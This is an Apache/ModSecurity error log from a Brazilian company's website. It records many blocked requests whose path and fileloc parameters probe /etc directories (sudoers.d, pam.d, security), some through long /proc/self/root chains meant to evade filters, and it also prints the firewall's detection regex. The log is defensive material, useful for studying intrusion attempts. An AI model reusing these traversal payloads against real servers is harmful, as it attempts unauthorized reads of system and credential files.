[Fri Mar 20 09:16:40.205920 2026] [:error] [pid 7893:tid 140411590858496] [client 74.7.243.128:54416] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06qBCii7xarUs8iHZ2cwAAAhI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:16:56.345954 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:54430] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06uNa6ubjKNq_cu4bmDAAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:17:00.353487 2026] [:error] [pid 7893:tid 140411725141760] [client 74.7.243.128:40290] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06uxCii7xarUs8iHZ2iAAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:17:04.916640 2026] [:error] [pid 9818:tid 140411632822016] [client 74.7.243.128:42828] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06wF1pVZ5mVmJwsFNAygAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:17:06.916493 2026] [:error] [pid 11167:tid 140411574073088] [client 74.7.243.128:42834] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06wvHIg5MgXLBnicMGEgAAAdQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:17:10.571749 2026] [:error] [pid 10189:tid 140411674785536] [client 74.7.243.128:42840] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06xjJ3M9BSuKP7CAYt7wAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:17:18.611778 2026] [:error] [pid 21219:tid 140411599251200] [client 74.7.243.128:37856] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab06zvXLqtnMIWvjpaKpegAAApE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:17:26.238908 2026] [:error] [pid 7235:tid 140411582465792] [client 74.7.243.128:35338] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab061vqxLDW4GITHUkT47QAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:18:08.199038 2026] [:error] [pid 7893:tid 140411607643904] [client 74.7.243.128:35340] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07ABCii7xarUs8iHZ22AAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:18:10.021889 2026] [:error] [pid 10189:tid 140411733534464] [client 216.73.216.191:51500] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07AjJ3M9BSuKP7CAYuLgAAAIE"]
[Fri Mar 20 09:18:10.598564 2026] [:error] [pid 7235:tid 140411565680384] [client 74.7.243.128:48854] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07AvqxLDW4GITHUkT5DQAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:18:15.214213 2026] [:error] [pid 10189:tid 140411725141760] [client 216.73.216.191:51790] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07BzJ3M9BSuKP7CAYuNgAAAII"]
[Fri Mar 20 09:18:16.171575 2026] [:error] [pid 9818:tid 140411649607424] [client 216.73.216.191:51860] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07CF1pVZ5mVmJwsFNBAgAAAEs"]
[Fri Mar 20 09:18:17.392385 2026] [:error] [pid 7235:tid 140411674785536] [client 216.73.216.191:51930] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/euca2ools"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07CfqxLDW4GITHUkT5FwAAAQg"]
[Fri Mar 20 09:18:21.870998 2026] [:error] [pid 9818:tid 140411725141760] [client 216.73.216.191:52158] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07DV1pVZ5mVmJwsFNBCAAAAEI"]
[Fri Mar 20 09:18:21.877057 2026] [:error] [pid 9818:tid 140411557287680] [client 216.73.216.191:52134] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07DF1pVZ5mVmJwsFNBBgAAAFY"]
[Fri Mar 20 09:18:22.483395 2026] [mime_magic:error] [pid 10189:tid 140411607643904] (70014)End of file found: [client 57.141.18.38:52230] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:18:23.339835 2026] [:error] [pid 7893:tid 140411658000128] [client 216.73.216.191:52270] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07DxCii7xarUs8iHZ27QAAAgo"]
[Fri Mar 20 09:18:25.213118 2026] [:error] [pid 26799:tid 140411607643904] [client 216.73.216.191:52408] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07Eda6ubjKNq_cu4bmUwAAA1A"]
[Fri Mar 20 09:18:26.054114 2026] [:error] [pid 31215:tid 140411658000128] [client 74.7.243.128:48864] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07EgF0L0L-SsrnPo54BQAAAso"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:18:28.628085 2026] [:error] [pid 10189:tid 140411641214720] [client 216.73.216.191:52630] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07FDJ3M9BSuKP7CAYuTAAAAIw"]
[Fri Mar 20 09:18:29.697418 2026] [:error] [pid 10189:tid 140411708356352] [client 74.7.243.128:58012] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07FTJ3M9BSuKP7CAYuTgAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:18:31.038907 2026] [:error] [pid 10189:tid 140411725141760] [client 74.7.243.128:46928] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/aliases"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07FzJ3M9BSuKP7CAYuUAAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:18:32.363352 2026] [:error] [pid 9818:tid 140411565680384] [client 74.7.243.128:46932] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07GF1pVZ5mVmJwsFNBDQAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:18:32.592158 2026] [:error] [pid 9818:tid 140411649607424] [client 74.7.243.128:46932] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07GF1pVZ5mVmJwsFNBDgAAAEs"], referer: 